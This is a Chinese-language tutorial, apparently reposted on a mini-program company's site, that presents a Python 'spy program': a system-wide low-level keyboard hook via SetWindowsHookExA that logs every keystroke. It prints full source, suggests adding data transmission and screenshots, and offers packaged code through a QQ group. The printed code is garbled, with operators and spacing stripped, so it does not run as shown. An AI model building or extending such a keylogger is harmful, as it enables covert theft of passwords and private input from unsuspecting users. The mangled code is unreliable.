微信小程序> Python开发一个间谍小程序,编程语言中的无间道,-达成小程序-小程序研发公司

Python开发一个间谍小程序,编程语言中的无间道,-达成小程序-小程序研发公司

浏览量:1283 时间: 来源:爬遍天下无敌手
1.

这次我们使用Python来打造一款间谍程序,程序中会用到许多知识点,大致分为四块:

win32APIPython基础,重点在cpytes库的使用C语言基础Hook2.

程序的基本原理在于通过注册Hook,记录系统事件。

3.

那么什么是Hook呢?

4.

Hook技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递

5.

注册Hook时我们需要先导入DLL库,在Python中我们使用ctypes来导入,导入方法如下

user32CDLL("user32.dll")kernel32CDLL("kernel32.dll")6.

我们导入了user32.dll和kernel32.dll。这两个DLL有什么用处呢

user32.dll是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息kernel32.dll控制着系统的内存管理、数据的输入输出操作和中断处理**流程部分7.

知道了我们要使用什么样的工具,那么第一步应该怎么做呢?

8.

1、首先我们需要先注册Hook到系统上,通过user32.dll中的SetWindowsHookExA函数,我们可以在系统上注册钩子

HHOOKSetWindowsHookExA(intidHook,HOOKPROClpfn,HINSTANCEhmod,DWORDdwThreadId);9.

通过查看文档我们看到SetWindowsHookExA函数的参数及参数类型如上所示。

10.

通过文档我们看到第一个参数idHook中填入钩子的类型

11.

WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件

12.

第二个参数lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的

13.

第三个参数hmod表示为DLL句柄,我们可以使用kernel32中的GetModuleHandleW来获取句柄

14.

最后一个参数dwThreadId我们填入0代表与同一桌面上所有的线程关联

15.

代码如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)16.

如何使用Python来编写我们的钩子过程呢,通过ctypes文档我们可以得知windows下使用WINFUNCTYPE来创建函数

17.

此时我们发现有WINFUNCTYPE和CFUNCTYPE两个函数,具体要使用哪一个呢,这两个的区别为

WINFUNCTYPE为Windows下独有的,通过使用使用stdcall调用约定的函数CFUNCTYPE使用标准C调用约定的函数HOOKPROCWINFUNCTYPE(c_int,c_int,c_int,POINTER(DWORD))18.

因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数,同时我们也需要在Python定义它

19.

LowLevelKeyboardProc数据结构如下

LRESULTCALLBACKLowLevelKeyboardProc(_In_intnCode,_In_WPARAMwParam,_In_LPARAMlParam);20.

按照官方文档提示如果**nCode**小于零,则挂钩过程必须将消息传递给CallNextHookEx函数,而无需进一步处理,并且应返回CallNextHookEx返回的值

21.

我们转换为Python代码

classKBDLLHOOKSTRUCT(Structure):_fields_[('vkCode',DWORD),('scanCode',DWORD),('flags',DWORD),('time',DWORD),('dwExtraInfo',DWORD)]defhookProc(nCode,wParam,lParam):ifnCode0:returnuser32.CallNextHookEx(hooked,nCode,wParam,lParam)else:#此处插入我们的代码passreturnuser32.CallNextHookEx(hooked,nCode,wParam,lParam)22.

最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢,虽然在Windows7及更高版本上,该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除

23.

删除需要使用user32.dll的UnhookWindowsHookEx,参数为Hook句柄

24.

user32.UnhookWindowsHookEx(hooked)

25.

下面贴上全部代码

importsysfromctypesimport*fromctypes.wintypesimportDWORD,HHOOK,HINSTANCE,MSG,WPARAM,LPARAMuser32CDLL("user32.dll")kernel32CDLL("kernel32.dll")classKBDLLHOOKSTRUCT(Structure):_fields_[('vkCode',DWORD),('scanCode',DWORD),('flags',DWORD),('time',DWORD),('dwExtraInfo',DWORD)]defuninstallHookProc(hooked):ifhookedisNone:returnuser32.UnhookWindowsHookEx(hooked)hookedNonedefhookProc(nCode,wParam,lParam):ifnCode0:returnuser32.CallNextHookEx(hooked,nCode,wParam,lParam)else:ifwParam256:if162lParam.contents.value:print("Ctrlpressed,callHookuninstall()")uninstallHookProc(hooked)sys.exit(-1)capsLockuser32.GetKeyState(20)#kb_structcast(lParam,POINTER(KBDLLHOOKSTRUCT))iflParam.contents.value13:print("")elifcapsLock:print(chr(lParam.contents.value),end"")else:print(chr(lParam.contents.value+32),end"")returnuser32.CallNextHookEx(hooked,nCode,wParam,lParam)defstartKeyLog():msgMSG()user32.GetMessageA(byref(msg),0,0,0)definstallHookProc(hooked,pointer):hookeduser32.SetWindowsHookExA(13,pointer,kernel32.GetModuleHandleW(),0)ifnothooked:returnFalsereturnTrueHOOKPROCWINFUNCTYPE(c_int,c_int,c_int,POINTER(DWORD))pointerHOOKPROC(hookProc)hookedNoneifinstallHookProc(hooked,pointer):print("Hookinstalled")try:msgMSG()user32.GetMessageA(byref(msg),0,0,0)exceptKeyboardInterruptaskerror:uninstallHookProc(hooked)print("Hookuninstall...")else:print("Hookinstallederror")26.

贴上我们的效果图

27.

我们还可以再添加上额外的代码比如数据传输,截屏等等^_^

28.

源码不多很短,以打包好需要加下群:850591259

版权声明

即速应用倡导尊重与保护知识产权。如发现本站文章存在版权问题,烦请提供版权疑问、身份证明、版权证明、联系方式等发邮件至197452366@qq.com ,我们将及时处理。本站文章仅作分享交流用途,作者观点不等同于即速应用观点。用户与作者的任何交易与本站无关,请知悉。

产品经理

手机 : 13312967497

擅长 : 小程序流量变现

扫码领取礼包

最新资讯

热门模板

  • 头条
  • 搜狐
  • 微博
  • 百家
  • 一点资讯
  • 知乎